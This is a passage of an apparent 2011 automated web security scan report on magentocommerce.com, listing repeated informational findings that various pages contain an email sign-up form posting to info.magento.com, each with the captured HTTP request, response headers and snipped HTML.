<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.27. http://www.magentocommerce.com/company/media  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/media

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /company/media HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175832; expires=Sat, 11-Aug-2012 15:03:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fcompany%2Fmedia%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:53 GMT
Content-Length: 42971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.28. http://www.magentocommerce.com/company/media/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/media/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /company/media/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175868; expires=Sat, 11-Aug-2012 15:04:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fcompany%2Fmedia%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:28 GMT
Content-Length: 42971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.29. http://www.magentocommerce.com/company/pci-compliance  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/pci-compliance

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /company/pci-compliance HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175798; expires=Sat, 11-Aug-2012 15:03:18 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fcompany%2Fpci-compliance%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:18 GMT
Content-Length: 35471

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.30. http://www.magentocommerce.com/company/press-releases  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/press-releases

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /company/press-releases HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175819; expires=Sat, 11-Aug-2012 15:03:40 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fcompany%2Fpress-releases%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:40 GMT
Content-Length: 41130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.31. http://www.magentocommerce.com/company/press-releases/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/press-releases/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /company/press-releases/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175845; expires=Sat, 11-Aug-2012 15:04:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fcompany%2Fpress-releases%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:05 GMT
Content-Length: 41130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.32. http://www.magentocommerce.com/company/privacy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/privacy

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /company/privacy HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175832; expires=Sat, 11-Aug-2012 15:03:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fcompany%2Fprivacy%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:52 GMT
Content-Length: 49802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.33. http://www.magentocommerce.com/company/terms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/terms

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /company/terms HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175839; expires=Sat, 11-Aug-2012 15:03:59 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fcompany%2Fterms%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:59 GMT
Content-Length: 41069

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.34. http://www.magentocommerce.com/de  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /de

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /de HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176483; expires=Sat, 11-Aug-2012 15:14:43 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fde%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:44 GMT
Content-Length: 69992

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- me
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.35. http://www.magentocommerce.com/demo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /demo

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /demo HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175788; expires=Sat, 11-Aug-2012 15:03:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fdemo%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:08 GMT
Content-Length: 39549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.36. http://www.magentocommerce.com/design_guide  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /design_guide

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /design_guide HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176273; expires=Sat, 11-Aug-2012 15:11:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fdesign_guide%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:13 GMT
Content-Length: 35263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.37. http://www.magentocommerce.com/dk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /dk

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /dk HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176568; expires=Sat, 11-Aug-2012 15:16:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fdk%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:09 GMT
Content-Length: 39933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.38. http://www.magentocommerce.com/download  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /download HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/product/emerging-business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170943; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A1%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A3%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.10.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:47:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171254; expires=Sat, 11-Aug-2012 13:47:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:47:34 GMT
Content-Length: 170988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.39. http://www.magentocommerce.com/download/diff  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download/diff

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /download/diff HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176284; expires=Sat, 11-Aug-2012 15:11:24 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fdownload%2Fdiff%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:24 GMT
Content-Length: 70455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.40. http://www.magentocommerce.com/download/release_notes  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download/release_notes

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /download/release_notes HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176308; expires=Sat, 11-Aug-2012 15:11:48 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fdownload%2Frelease_notes%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:49 GMT
Content-Length: 282941

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.41. http://www.magentocommerce.com/es  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /es

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

